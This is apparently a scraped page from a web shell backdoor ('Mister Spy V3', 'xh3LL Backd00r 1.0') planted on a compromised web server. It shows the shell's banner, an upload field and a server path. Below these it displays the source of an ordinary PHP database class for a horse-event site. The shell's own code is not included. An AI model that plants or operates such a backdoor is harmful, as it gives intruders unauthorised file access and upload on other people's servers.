Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/library/
Upload File :
Current File : /home/caballoscriollos/www/espanol/library/class.eventosfuncionalespruebascategorias.php

<?php 

require_once('class.dbaccess.php');
require_once('class.lugar.php');
require_once('class.eventosfuncionalespruebascategoria.php');
require_once('class.filter.php');
require_once('class.page.php');

class EventosFuncionalesPruebasCategorias extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';
		
		if (isset($filter['Nombre']))
		{
			$sql.= " AND ( pr.Nombre LIKE '%" . DB::StringUnquoted($filter['Nombre']) . "%'";
			$sql.= " OR pr.Nombre IS NULL)";
		}
		
		if (isset($filter['IdEventosFuncionalesPruebasCategoria']) && $filter['IdEventosFuncionalesPruebasCategoria'] != "")
		{
			$sql.= " AND pa.IdEventosFuncionalesPruebasCategoria = " . DB::Number($filter['IdEventosFuncionalesPruebasCategoria']);
		}
		
		if (isset($filter['IdEventosFuncionalesPruebasCategoria']) && $filter['IdEventosFuncionalesPruebasCategoria'] != "")
		{
			$sql.= " AND pa.IdEventosFuncionalesPruebasCategoria = " . DB::Number($filter['IdEventosFuncionalesPruebasCategoria']);
		}
		
		if (isset($filter['IdEventosFuncionalesPrueba']) && $filter['IdEventosFuncionalesPrueba'] != "")
		{
			$sql.= " AND pr.IdEventosFuncionalesPrueba = " . DB::Number($filter['IdEventosFuncionalesPrueba']);
		}
		
		return $sql;
	}


	public function GetPagesCount(Page $oPage, $filter = false)
	{	
		$sql = "SELECT COUNT(1) / " . DB::Number($oPage->Size) . " AS Count";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias pr";
		$sql.= " INNER JOIN tblEventosFuncionalesPruebas pa ON pr.IdEventosFuncionalesPrueba = pa.IdEventosFuncionalesPrueba";
		$sql.= " WHERE 1 ";
		
		if ($filter)
			$sql.= " " . $this->ParseFilter($filter);
		
		if (!($oRes = $this->GetQuery($sql)) )		
			return false;

		if ( !($oRow = $oRes->GetRow()) )
			return false;
		
		$Count = $oRow['Count'];
		$Count = ceil($Count);
		
		return $Count;
	}
	
	
	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT pr.*,";
		$sql.= " pr.IdEventosFuncionalesPruebasCategoria ";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias pr";
		$sql.= " INNER JOIN tblEventosFuncionalesPruebas pa ON pr.IdEventosFuncionalesPrueba = pa.IdEventosFuncionalesPrueba ";
		$sql.= " WHERE 1 ";
		
		if ($filter)
			$sql.= $this->ParseFilter($filter);

		//$sql.= " ORDER BY Nombre ASC";
		$sql.= " ORDER BY IdEventosFuncionalesPrueba ASC";

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
		
		while ($oRow = $oRes->GetRow())	
		{	
			$oEventosFuncionalesPruebasCategoria = new EventosFuncionalesPruebasCategoria();
			$oEventosFuncionalesPruebasCategoria->ParseFromArray($oRow);
			
			array_push($arr, $oEventosFuncionalesPruebasCategoria);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}
	

	public function GetAllByCategoria(EventosFuncionalesPrueba $oEventosFuncionalesPrueba)
	{
		$arr = array();
	
		$sql = "SELECT pr.*,";
		$sql.= " pa.Nombre as CategoriaNombre";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias pr";
		$sql.= " INNER JOIN tblEventosFuncionalesPruebas pa ON pr.IdEventosFuncionalesPruebasCategoria = pa.IdEventosFuncionalesPruebasCategoria";
		$sql.= " WHERE pr.IdEventosFuncionalesPruebasCategoria = " . DB::Number($oEventosFuncionalesPrueba->IdEventosFuncionalesPruebasCategoria);
		$sql.= " ORDER BY CategoriaNombre, pr.Nombre ASC";

		if ( !($oRes = $this->GetQuery($sql)) )
			return false;
					
		while ($oRow = $oRes->GetRow())	
		{	
			$oEventosFuncionalesPruebasCategoria = new EventosFuncionalesPruebasCategoria();
			$oEventosFuncionalesPruebasCategoria->ParseFromArray($oRow);
			
			array_push($arr, $oEventosFuncionalesPruebasCategoria);
			
			$oRes->MoveNext();
		}	

		return $arr;
	}

	public function GetById($IdEventosFuncionalesPruebasCategoria)
	{
		$sql = "SELECT pr.*, ";
		$sql.= " pa.Nombre as PruebaNombre ";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias pr ";
		$sql.= " INNER JOIN tblEventosFuncionalesPruebas pa ON pr.IdEventosFuncionalesPrueba = pa.IdEventosFuncionalesPrueba ";
		$sql.= " WHERE IdEventosFuncionalesPruebasCategoria = " . DB::Number($IdEventosFuncionalesPruebasCategoria);	

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oEventosFuncionalesPruebasCategoria = new EventosFuncionalesPruebasCategoria();
		$oEventosFuncionalesPruebasCategoria->ParseFromArray($oRow);
		
		return $oEventosFuncionalesPruebasCategoria;		
	}

	public function GetNombreById($IdEventosFuncionalesPruebasCategoria)
	{

		$sql = "SELECT Nombre ";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias ";
		$sql.= " WHERE IdEventosFuncionalesPruebasCategoria = " . DB::Number($IdEventosFuncionalesPruebasCategoria);	

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;

		return $oRow['Nombre'];		
	}
	
	public function GetByPruebaId($IdEventosFuncionalesPrueba)
	{
		$arr = array();

		$sql = "SELECT pr.*,";
		$sql.= " pa.Nombre as PruebaNombre";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias pr";
		$sql.= " INNER JOIN tblEventosFuncionalesPruebas pa ON pr.IdEventosFuncionalesPrueba = pa.IdEventosFuncionalesPrueba";
		$sql.= " WHERE pa.IdEventosFuncionalesPrueba = " . DB::Number($IdEventosFuncionalesPrueba);	
		$sql.= " ORDER BY Nombre";

		if ( !($oRes = $this->GetQuery($sql)) )
			return false;

		while ($oRow = $oRes->GetRow())	
		{	
			$oEventosFuncionalesPruebasCategoria = new EventosFuncionalesPruebasCategoria();
			$oEventosFuncionalesPruebasCategoria->ParseFromArray($oRow);
			
			array_push($arr, $oEventosFuncionalesPruebasCategoria);
			
			$oRes->MoveNext();
		}	

		return $arr;

	}
	
	public function GetFinalByPruebaId($IdEventosFuncionalesPrueba)
	{
		$arr = array();

		$sql = "SELECT pr.*,";
		$sql.= " pa.Nombre as PruebaNombre";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias pr";
		$sql.= " INNER JOIN tblEventosFuncionalesPruebas pa ON pr.IdEventosFuncionalesPrueba = pa.IdEventosFuncionalesPrueba";
		$sql.= " WHERE pa.IdEventosFuncionalesPrueba = " . DB::Number($IdEventosFuncionalesPrueba);	
		$sql.= " AND pr.Final = '1'";

		if ( !($oRes = $this->GetQuery($sql)) )
			return false;

		while ($oRow = $oRes->GetRow())	
		{	
			$oEventosFuncionalesPruebasCategoria = new EventosFuncionalesPruebasCategoria();
			$oEventosFuncionalesPruebasCategoria->ParseFromArray($oRow);
			
			array_push($arr, $oEventosFuncionalesPruebasCategoria);
			
			$oRes->MoveNext();
		}	

		return $arr;

	}

	public function GetByNombre($Nombre, $IdEventosFuncionalesPruebasCategoria)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias pr";
		$sql.= " INNER JOIN tblEventosFuncionalesPruebas pa ON pr.IdEventosFuncionalesPruebasCategoria = pa.IdEventosFuncionalesPruebasCategoria";
		$sql.= " WHERE pr.Nombre = " . DB::String($Nombre);
		$sql.= " AND IdEventosFuncionalesPruebasCategoria <> " . DB::Number($IdEventosFuncionalesPruebasCategoria);

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oEventosFuncionalesPruebasCategoria = new EventosFuncionalesPruebasCategoria();
		$oEventosFuncionalesPruebasCategoria->ParseFromArray($oRow);
		
		return $oEventosFuncionalesPruebasCategoria;		
	}
	
	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT pr.*,";
		$sql.= " pa.Nombre as CategoriaNombre, pa.IdEventosFuncionalesPrueba ";
		$sql.= " FROM tblEventosFuncionalesPruebasCategorias pr";
		$sql.= " INNER JOIN tblEventosFuncionalesPruebas pa ON pr.IdEventosFuncionalesPrueba = pa.IdEventosFuncionalesPrueba";
		$sql.= " WHERE 1";
		
		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY CategoriaNombre, Nombre ASC";
		
		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	
	public function Create(EventosFuncionalesPruebasCategoria $oEventosFuncionalesPruebasCategoria)
	{
		$arr = array
		(
			'IdEventosFuncionalesPrueba' => DB::Number($oEventosFuncionalesPruebasCategoria->IdEventosFuncionalesPrueba),
			'Nombre' => DB::String($oEventosFuncionalesPruebasCategoria->Nombre)
		);
		
		if (!$this->Insert('tblEventosFuncionalesPruebasCategorias', $arr))
			return false;
			
		return $oEventosFuncionalesPruebasCategoria;
	}
	
	
	public function Update(EventosFuncionalesPruebasCategoria $oEventosFuncionalesPruebasCategoria)
	{
		$where = " IdEventosFuncionalesPruebasCategoria = " . DB::Number($oEventosFuncionalesPruebasCategoria->IdEventosFuncionalesPruebasCategoria);
		
		$arr = array
		(
			'IdEventosFuncionalesPruebasCategoria' => DB::Number($oEventosFuncionalesPruebasCategoria->IdEventosFuncionalesPruebasCategoria),
			'Nombre' => DB::String($oEventosFuncionalesPruebasCategoria->Nombre)
		);
		
		if (!DBAccess::Update('tblEventosFuncionalesPruebasCategorias', $arr, $where))
			return false;
		
		return $oEventosFuncionalesPruebasCategoria;
	}
	

	public function Delete($IdEventosFuncionalesPruebasCategoria)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdEventosFuncionalesPruebasCategoria = " . DB::Number($IdEventosFuncionalesPruebasCategoria);
		
		if (!DBAccess::Delete('tblEventosFuncionalesPruebasCategorias', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat